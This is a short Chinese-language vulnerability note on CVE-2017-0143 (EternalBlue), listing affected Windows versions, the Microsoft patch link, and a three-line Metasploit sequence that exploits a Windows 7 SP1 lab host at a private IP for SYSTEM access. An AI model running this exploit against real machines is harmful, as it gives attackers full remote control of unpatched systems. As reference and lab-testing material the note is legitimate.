CVE-2017-0143
描述
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网。大名鼎鼎的永恒之蓝漏洞
影响版本
Product | Version | Update | Edition | Tested |
---|---|---|---|---|
Windows 10 | ||||
Windows 10 | 1511 | |||
Windows 10 | 1607 | |||
Windows 7 | - | SP1 | :heavy_check_mark: | |
Windows 8.1 | ||||
Windows Rt 8.1 | - | |||
Windows Server 2008 | - | SP2 | ||
Windows Server 2008 | R2 | SP1 | ||
Windows Server 2012 | R2 | |||
Windows Server 2012 | Gold | |||
Windows Server 2016 | ||||
Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143
利用方式
直接用msf就行,方便快捷,测试系统windows 7 sp1 x64
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.0.128
run
并且权限是system的